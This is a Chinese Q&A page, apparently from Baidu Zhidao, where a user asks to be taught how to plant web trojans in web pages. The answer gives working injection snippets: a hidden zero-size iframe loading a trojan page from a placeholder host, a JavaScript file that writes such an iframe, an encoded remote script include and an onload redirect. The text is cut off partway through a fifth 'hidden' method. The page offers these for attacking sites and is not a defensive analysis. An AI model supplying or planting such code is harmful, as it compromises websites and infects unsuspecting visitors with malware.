谁能教我网页挂马

来源:百度知道 编辑:UC知道 时间:2024/06/10 16:00:17
谁能教我网页挂马!!!!
重积分相谢~~~~~~

一:框架挂马

   <iframe src=网马的地址,比如:http://www.xxx.com/ma.htm ;

width=0 height=0></iframe> 

二:js文件挂马

document.write("<iframe width='0' height='0' src='地

址'></iframe>"); 左边代码保存为1.js,

JS挂马代码

<script language=javascript src=1.js></script>

三:js变形加密

   

   <SCRIPT language="JScript.Encode"          

src=http://www.xxx.com/ma.txt>;</script> 

   muma.txt可改成任意后缀

四:body挂马

   <body onload="window.location='地址';"></body>

五:隐蔽挂马

 

   top.document.body.inn